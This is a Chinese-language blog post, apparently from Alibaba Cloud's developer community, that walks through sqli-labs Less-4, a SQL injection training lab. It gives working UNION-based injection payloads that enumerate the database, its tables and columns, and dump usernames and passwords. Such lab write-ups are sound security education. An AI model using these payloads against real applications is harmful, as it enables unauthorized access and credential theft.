AI 助理
备案控制台
开发者社区 数据库 文章 正文

[网络安全]sqli-labs Less-4 解题详析

2023-05-22 79
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 判断注入类型GET1" and "1"="1,回显如下

判断注入类型

GET1" and "1"="1,回显如下:

image.png

GET1" and "1"="2

没有回显,说明该漏洞类型为GET型双引号字符型注入

image.png

判断注入点个数

GET1" order by 3 --+

image.png


由上图可知,sql语法中给$id加上了()

猜测后端语句为SELECT * FROM xx where id=("$id")

故构造GET1') order by 3 --+,此时后端语句为SELECT * FROM xx where id=("1") order by 3 --+")

即SELECT * FROM xx where id=("-1") order by 3


image.png

image.png

GET1") order by 3 --+

image.png

GET1") order by 4 --+

故注入点为3个


查库名

GET-1") union select 1,2,database(); --+

回显库名security

image.png



查表名

-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

1

回显四个表名

image.png



查users表的列名

-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+


image.png


查字段

Payload:-1") union select 1,group_concat(username),group_concat(password) from 库名.表名; --+

实例如下:


-1") union select 1,group_concat(username),group_concat(password) from security.users; --+

1

image.png


总结

以上为[网络安全]sqli-labs Less-4 解题详析,后续将分享[网络安全]sqli-labs Less-5 解题详析

原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析

我是秋说,我们下次见。


文章标签:
SQL
网络安全
安全
关键词:
网络安全详析
网络安全sqli-labs详析
网络安全解题
网络安全sqli-labs解题详析
网络sqli-labs
秋说
目录
相关文章
秋说
|
8月前
|
存储 安全 生物认证
【网络安全 | 指纹识别工具】WhatWeb使用详析
【网络安全 | 指纹识别工具】WhatWeb使用详析
秋说
460 0
【网络安全 | 指纹识别工具】WhatWeb使用详析
秋说
|
8月前
|
网络安全 虚拟化
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
秋说
293 0
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
秋说
|
8月前
|
网络协议 Unix Linux
【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
秋说
259 0
秋说
|
8月前
|
安全 Java 网络安全
【网络安全 | 扫描器】御剑安装及使用教程详析
【网络安全 | 扫描器】御剑安装及使用教程详析
秋说
1711 0
秋说
|
8月前
|
Web App开发 算法 网络安全
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
秋说
756 0
秋说
|
8月前
|
前端开发 安全 JavaScript
【网络安全 | 网安工具】御剑WEB指纹识别系统使用详析
【网络安全 | 网安工具】御剑WEB指纹识别系统使用详析
秋说
350 0
秋说
|
8月前
|
网络安全
[网络安全]sqli-labs Less-26 解题详析
[网络安全]sqli-labs Less-26 解题详析
秋说
109 0
秋说
|
8月前
|
SQL 网络安全 数据库
[网络安全]sqli-labs Less-26a 解题详析
[网络安全]sqli-labs Less-26a 解题详析
秋说
101 0
秋说
|
8月前
|
SQL 网络安全
[网络安全]sqli-labs Less-25a 解题详析
[网络安全]sqli-labs Less-25a 解题详析
秋说
67 0
丰宝宝
|
23天前
|
SQL 安全 网络安全
网络安全与信息安全:知识分享####
【10月更文挑战第21天】 随着数字化时代的快速发展,网络安全和信息安全已成为个人和企业不可忽视的关键问题。本文将探讨网络安全漏洞、加密技术以及安全意识的重要性,并提供一些实用的建议,帮助读者提高自身的网络安全防护能力。 ####
丰宝宝
61 17

热门文章

最新文章

  • 1
    网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
  • 2
    NIST(美国国家标准与技术研究院)在网络安全领域进行了多项创新
  • 3
    网络安全之盾:漏洞防御与加密技术解析
  • 4
    云计算与网络安全:技术融合下的挑战与机遇
  • 5
    网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
  • 6
    网络安全漏洞、加密技术与安全意识:保护你的数字身份
  • 7
    网络安全漏洞、加密技术与安全意识的知识分享
  • 8
    云计算与网络安全:探索云服务、网络安全和信息安全的交汇点
  • 9
    网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
  • 10
    网络安全漏洞与防御策略:深入加密技术和安全意识的培养
  • 1
    Kubernetes学习-集群搭建篇(二) 部署Node服务,启动JNI网络插件
    349
  • 2
    什么是网络安全等级保护测评(等保测评)?
    294
  • 3
    网络安全与信息安全:保护你的数据,保护你的世界
    56
  • 4
    网络防御前线:洞悉漏洞、加密之盾与安全意识觉醒
    43
  • 5
    探索现代网络安全的多层次防御机制
    236
  • 6
    网络安全与信息安全:防御前线的关键技术与意识觉醒
    48
  • 7
    数字堡垒的构建者:网络安全与信息安全的深层剖析
    65
  • 8
    Linux网络编程 网络基础知识
    78
  • 9
    开发板配置网络ssh登入
    79
  • 10
    网络编程知识点总结(7)
    60

    • 相关课程

    更多
  • 云计算工程师解析与实战-网络专家篇(体验版)
  • 云网络白皮书-阿里云网络系列课
  • 网络安全攻防 - Web渗透测试
  • 企业上云攻略-阿里云网络产品应用系列教程
  • Linux网络进阶 - TCP/IP协议及OSI七层模型
  • 网络管理者必知-2分钟了解新出台的《网络安全法》

    • 相关电子书

    更多
  • Session:更加安全、可靠的数据中心网络产品更新
  • Session:极简易用的全球化网络产品更新
  • Session:弹性、高可用、可观测的应用交付网络产品更新

    • 相关实验场景

    更多
  • 容器的网络入门
  • 容器的自定义网络
  • 容器的共享网络模型
  • 使用阿里云容器服务和容器网络文件系统搭建WordPress网站
    • 下一篇
    DataWorks智能交互式数据开发与分析之旅